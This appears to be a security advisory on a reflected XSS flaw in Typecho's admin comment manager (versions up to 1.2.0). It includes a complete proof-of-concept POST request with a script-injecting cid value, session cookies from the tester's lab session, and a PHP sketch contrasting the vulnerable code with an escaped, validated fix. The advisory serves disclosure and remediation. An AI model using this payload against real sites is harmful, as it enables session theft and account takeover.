Description
The Typecho admin backend Comment Manager (/admin/manage-comments.php) is vulnerable to reflected XSS via the unfiltered POST parameter cid.
Affected Version
Typecho <= 1.2.0
POC
- Log in to the Typecho admin backend management system.
- In Comment Manager (/admin/manage-comments.php), the unfiltered $request->cid is echoed directly into the HTML.
The full POC request:

POST /cms/typecho/admin/manage-comments.php?status=wating&category=&keywords=abc&__typecho_all_posts=off&uid= HTTP/1.1
Host: 192.168.0.10
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.0.10/cms/typecho/admin/login.php?referer=http%3A%2F%2F192.168.0.10%2Fcms%2Ftypecho%2Fadmin%2Fmanage-comments.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: 745020ecd4b17dde48d43755702a78b4__typecho_uid=1; 745020ecd4b17dde48d43755702a78b4__typecho_authCode=%24T%249aGUcl7K02f405471bbdacf65892bf8ffb75bc211; PHPSESSID=m7h7isuus6cugk6mb58vdah296; u5DD_2132_saltkey=ql9191Ym; u5DD_2132_lastvisit=1677486351; u5DD_2132_seccodecSASGLE52ETX=1.1b4fba6d0be0f7dce2; u5DD_2132_ulastactivity=dd6b5bfUH2dwkFNJ5HnOvs2bnRKl16bY2TMsiYWsOsPOeru7pyMl; u5DD_2132_auth=ade9wjKb33QiAdI8RrnDloFyK4vB8ca3sx7pIgT0BNlWPo1CeA%2Bsk87ST8rZ%2FVqZTdeIhOInVMfZCF8zm7uu; u5DD_2132_lastcheckfeed=1%7C1677489964; u5DD_2132_nofavfid=1; u5DD_2132_home_diymode=1; u5DD_2132_visitedfid=2; u5DD_2132_smile=1D1; u5DD_2132_home_readfeed=1677497943; u5DD_2132_forum_lastvisit=D_2_1677498054; u5DD_2132_st_t=1%7C1677498055%7C9149ebde1ec47006277ae3faf93f0e2f; u5DD_2132_editormode_e=1; u5DD_2132_st_p=1%7C1677498095%7C926ebc78300a154f5ad9ebb023eb0b77; u5DD_2132_viewid=tid_1; u5DD_2132_seccode=5.792e3c6d8b004d4403; u5DD_2132_seccodecSE52ETX=6.a73b7daa353701b59a
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 44

coid[]=1&cid="><script>alert(1)</script>
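The root cause is a request value written back into the comment-management page without escaping for its HTML context. The PHP snippet below is an added illustration, not Typecho's own code: renderCidFieldVulnerable, renderCidFieldSafe, normalizeCid and the hidden-input markup are assumptions chosen to show the defective pattern next to a fixed one.

```php
<?php
// Added illustration, not Typecho's own code: a hypothetical helper that
// writes the "cid" filter value of the comment list back into the page.

// Vulnerable pattern: the raw parameter is concatenated into an attribute.
// A value that starts with  ">  closes the attribute and the tag, so the
// rest of the value is parsed by the browser as markup.
function renderCidFieldVulnerable(string $cid): string
{
    return '<input type="hidden" name="cid" value="' . $cid . '">';
}

// Fixed pattern: encode for the HTML attribute context. ENT_QUOTES encodes
// both " and ', so the value can never terminate the attribute;
// ENT_SUBSTITUTE avoids returning an empty string on invalid UTF-8.
function renderCidFieldSafe(string $cid): string
{
    $encoded = htmlspecialchars($cid, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
    return '<input type="hidden" name="cid" value="' . $encoded . '">';
}

// Defence in depth: cid identifies a content item, so anything that is not
// a non-negative integer is rejected before it reaches a template at all.
function normalizeCid(?string $raw): ?int
{
    if ($raw === null || !preg_match('/^\d+$/', $raw)) {
        return null;
    }
    return (int) $raw;
}

// Constructed sample input: the cid value from the POC request above.
$payload = '"><script>alert(1)</script>';

echo "vulnerable: ", renderCidFieldVulnerable($payload), PHP_EOL;
echo "escaped:    ", renderCidFieldSafe($payload), PHP_EOL;
var_dump(normalizeCid($payload)); // rejected: not an integer
var_dump(normalizeCid('1'));      // accepted as an integer id
```

Running it shows the vulnerable line emitting a closed input tag followed by a live script element, while the escaped line keeps the whole value inside the attribute as entity-encoded text.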
Reference
Reported by Srpopty; the vulnerability was discovered using Corax.